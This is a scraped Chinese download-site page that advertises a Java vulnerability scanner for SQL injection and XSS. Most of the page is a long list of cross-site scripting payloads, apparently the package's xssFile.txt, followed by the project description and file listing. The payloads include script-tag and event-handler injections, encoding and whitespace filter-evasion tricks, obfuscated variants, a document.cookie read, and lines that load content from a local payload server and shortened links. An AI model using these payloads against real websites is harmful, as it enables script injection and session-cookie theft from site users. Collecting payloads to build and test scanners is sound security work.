''">
-alert(1)-
-prompt(1)-
<marquee/onstart=confirm(1)>
javascript:confirm(1)
javascript:confirm(1);
javascript:alert(1)
javascript:alert(1);
avascript:alert(1)
javaSCRIPT:alert(1)
JaVaScRipT:alert(1)
javas	cript:\u0061lert(1);
javascript:\u0061lert(1)
javascript:alert(document.cookie)
vbscript:alert(1);
vbscript:alert(1);
vbscr	ipt:alert(1)"
'';!--"<KCF>=&{()}
<SCRIPT>+alert("KCF");</SCRIPT>
<SCRIPT>+alert("KCF")</SCRIPT>
<script>alert(1)</script>
<script>alert(/KCF/)</script>
' '><script>alert(1)</script>
''><script>alert(1)</script>
<svg><script>varmyvar="text";alert(1)//";</script></svg>
∀㸀㰀script㸀alert(1)㰀/script㸀
</script><script>alert(1)</script>
<a href="j&#x26#x41;vascript:alert%252831337%2529">KCF</a>
<scr\x00ipt>confirm(1);</scr\x00ipt>
<svg/onload=prompt(1);>
<svg><script>alert(/1/)</script>
<isindex action="javas	cript:alert(1)" type=image>
<form action='data:text/html,<script>alert(1)</script>'><button>CLICK
<form action='java	scri	pt:alert(1)'><button>CLICK
<form action=javascript
:alert(1)><input type=submit>
<form action="javas	cript:alert(1)" method="get"><input type="submit" value="Submit"></form>
<form action="	javas	cript	:alert('KCF :)')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>
<form id="myform" value="" action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/KCF/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg">
<script>var url = "<!--<script>";//</script>alert(1)</script>
<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript	:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>
<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))
<img/src='http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg' onmouseover=	prompt(1)
<svg><script>alert( 1)
<embed/src=//goo.gl/nlX0P>
<object/data=//goo.gl/nlX0P>
<iframesrc="javascript:alert(2)">
<iframe/src="data:text/html;	base64
,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">
<isindexformaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript:alert(1)>CLICKME
<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
“/><marquee onfinish=confirm(1)>a</marquee>
<object data='data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>'>
<img src= "a" onerror= 'eval(atob("cHJvbXB0KDEpOw=="))'
<script>alert('KCF')</script>=a
<script>document.write(toStaticHTML("<style>div{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}</style><div>POC</div>"))</script>
';!--"<XSS><script>alert(1);</script>={()}
<script>document.body.innerHTML="<a onmouseover%0B=location='\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x61\x6C\x65\x72\x74\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B'><input name=attributes>";</script>
asfunction:getURL,javascript:alert(1)//
\%22))}catch(e){}if(!self.a)self.a=!alert(1)//
"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//
<button/onclick=alert(1) >KCF</button>
<a onmouseover=(alert(1))>KCF</a>
<p/onmouseover=javascript:alert(1); >KCF</p>
<article xmlns="><img src=x onerror=alert(1)"></article>
<article xmlns="x:img src=x onerror=alert(1) ">
<p style="font-family:'\22\3bx:expression(alert(1))/*'">
<svg><style><img src=x onerror=alert(1)></svg>
<listing><img src=x onerror=alert(1)></listing>
"onmouseover=alert(1);a="
'+alert(1)&&null=='
+alert(1)&&null=='
\\\'><script>1<\\/script>
\\\'><body onload=\\\'1\\\'>
\"><script>1<\\/script>
><script>1<\\/script>
\"><body onload=\"1\">
<img src=\"x:kcf\" onerror=\"alert(1)\">
<img src=a onerror=alert(1)
<script>alert(\'1\')</script>
<script>alert(\'\\\\1\\\\\')</script>
<script>alert(\'\\/\\1\\/\\\')</script>
\'\'\">
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>
<script>alert(1);</script>
<%0ascript>alert(1);</script>
<%0bscript>alert(1);</script>
<!--[if]><script>alert(1)</script -->
<SCRIPT> alert(\"1\");</SCRIPT>
<SCRIPT> alert(\"1\")</SCRIPT>
<script>alert([!![]] [])</script>
<var onmouseover="prompt(1)">KCF</var>
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe>
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/KCF/)></script
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<meta http-equiv="refresh" content="0; url=data:text/html;blabla,<script>alert(1)</script>">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script/src=data:text/javascript,alert(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/kcf.html"');>
<table background=javascript:alert(1)></table>
<object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf
<applet code="javascript:confirm(1);">
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocu
没有合适的资源?快使用搜索试试~ 我知道了~
温馨提示
JavaSQLXSS漏洞扫描平台网页版 前端html + css jquery 后端springboot + java + mysql + idea 前后端分离开发 http://localhost:8080/login.html 数字型 http://xxx.xxxx.com/?page=2 字符漏洞 https://xxxx.com&topicid=4 xss漏洞格式 https://xxxx.com&topicid= post格式 id=,name= 模块介绍 登录模块 首页扫描 扫描列表 关于系统 密码修改 扫描功能介绍 xss扫描 存储型xss 反射型xss sql扫描 字符型 数字型 联合型 数据库设计scanvulnerability admin管理员 scanresults扫描结果
资源推荐
资源详情
资源评论
收起资源包目录
JavaSQLXSS漏洞扫描网页版.zip (12个子文件)
JavaSQLXSS漏洞扫描网页版
1.PNG 1.83MB
scanvulnerability.sql 481B
2.PNG 2.65MB
5.PNG 117KB
8.PNG 101KB
6.PNG 112KB
7.PNG 181KB
4.PNG 109KB
JavaSQLXSS漏洞扫描平台
程序设计说明.txt 2KB
3.PNG 103KB
9.PNG 52KB
xssFile.txt 109KB
共 12 条
- 1
资源评论
Strategic_Strategic
- 粉丝: 2
- 资源: 166
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功